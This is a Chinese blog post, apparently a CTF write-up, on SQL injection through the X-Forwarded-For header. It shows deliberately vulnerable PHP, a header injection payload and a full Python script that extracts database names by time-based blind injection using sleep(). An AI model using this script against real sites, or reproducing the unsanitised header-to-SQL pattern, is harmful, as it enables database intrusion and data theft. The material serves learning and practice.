依托http-headers的 sql注入和时间盲注

机缘巧合接触了一点关于sql注入的网络安全问题

依托 headers 的 sql 注入

一般来说大家都很清楚用户输入的危险性，通常会对用户表单提交的数据进行过滤（引号转码）。

但是如果写过网络爬虫，那么就很清楚其实http的headers 也是由用户自己构造的，因此对一些从headers获取的变量就不能掉以轻心。比如<strongstyle="color:#890729;">userAgent, ip等。

这里有一个sql注入的题目：who are you? -- http://www.shiyanbar.com/ctf/1941

代码漏洞示例

    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $cip = $_SERVER["HTTP_CLIENT_IP"];
    } else if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    } else if (!empty($_SERVER["REMOTE_ADDR"])) {
        $cip = $_SERVER["REMOTE_ADDR"];
    } else {
        $cip = 'unknow';
    }
    // 未对ip 进行安全转码
    echo 'Your IP address is : '.$cip;
    // 直接拼接sql，未使用pdo参数绑定
    $sql = "INSERT INTO IP (ip) VALUES ('$cip') ";
    $DB->query($sql);

构造sql注入的headers

接触过爬虫/CURL都很熟悉了，构造headers参数就行，以python为例：

headers = {
        "X-forwarded-for": "'+(select 1) and '1'='1"
}
req=requests.get(url,headers=headers)

如果顺利的话，应该会类似输出 Your IP address is : '+(select 1) and '1'='1

time-based 时间盲注

看到这里，你可能跟我一样有个疑问。怎么才能破解数据库的信息呢？虽然可以Drop database *;...

我们只能构造sql，并让服务器运行，却不能让页面输出sql的查询结果

这时候时间盲注就排上用场了 Sql注入系列详解(一)---基于时间差的盲注

它的原理很容易理解：

• sql执行速度，在查询条件不存在时响应很快（跟查询语句有关）
• sleep() 语句可以人为控制sql响应时间
• 虽然不能控制页面的输出，但是可以通过sleep()来控制页面响应时间。根据页面响应时间来判断是否命中查询信息

所以核心思想是，通过sql语句控制页面的响应时间

破解过程非常暴力，看代码一目了然：

def crack_records(url, sql, max_row, max_length):
    #guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
    # mysql 不区分大小写
    guess = string.ascii_lowercase+string.digits+string.punctuation
    res = []
    for n in range(0,max_row):        #假设爆破前 max_row 个记录
        result=''
        for i in range(1,max_length):                  #爆破字符串长度，假设不超过 max_length 长度
            flag=0
            for str in guess:                   #爆破该位置的字符

                headers = {"X-forwarded-for":"'+"+" (select case when (substring((%s limit 1 offset %d) FROM %d FOR 1)='%s') then sleep(8) else 1 end) and '1'='1" % (sql,n,i,str)}
                try:
                    req=requests.get(url,headers=headers,timeout=6)
                except:
                    result+=str
                    flag=1
                    print('正在扫描第%d个记录，the result now is '%(n+1) ,result)
                    break
            if flag==0:
                break
        res.append(result)
        #
        if i==1 and flag==0:
            print('扫描完成')
            break
    return res

# 除information_schema外的database
sql = "select schema_name from information_schema.SCHEMATA WHERE schema_name<>'information_schema' "
res = crack_records(url, sql, 100, 500)
print (res)

文章参考

实验吧CTF-Who are you？

总结

1. 破解过程非常耗时，根据网页的响应时长调整timeout阈值
2. 当网页因为其他原因超时相应时会产生误差，因此网络不好的情况下需要重复破解以精确结果。
3. 这些人好特么聪明啊啊啊啊啊！！！